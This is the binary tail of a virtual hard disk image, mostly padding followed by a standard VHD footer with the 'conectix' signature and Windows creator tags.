                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      conectix             +#6+win  
  Wi2k              �   ���
�?֍���F�˱ �                                                                                                                                                                                                                                                                                                                                                                                                                                            